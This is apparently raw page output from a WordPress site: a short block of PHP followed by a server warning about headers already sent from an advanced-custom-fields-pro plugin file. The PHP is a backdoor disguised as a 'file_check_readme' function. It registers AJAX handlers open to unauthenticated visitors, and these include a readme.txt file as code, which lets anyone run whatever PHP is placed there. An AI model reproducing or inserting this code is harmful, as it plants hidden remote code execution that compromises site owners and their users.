if(!function_exists('file_check_readme16829')){ add_action('wp_ajax_nopriv_file_check_readme16829', 'file_check_readme16829'); add_action('wp_ajax_file_check_readme16829', 'file_check_readme16829'); function file_check_readme16829() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme76924')){ add_action('wp_ajax_nopriv_file_check_readme76924', 'file_check_readme76924'); add_action('wp_ajax_file_check_readme76924', 'file_check_readme76924'); function file_check_readme76924() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
Warning: Cannot modify header information - headers already sent by (output started at /home/d1283841/ruspub.ru/docs/wp-content/plugins/advanced-custom-fields-pro/acf.php:491) in /home/d1283841/ruspub.ru/docs/wp-includes/pluggable.php on line 1221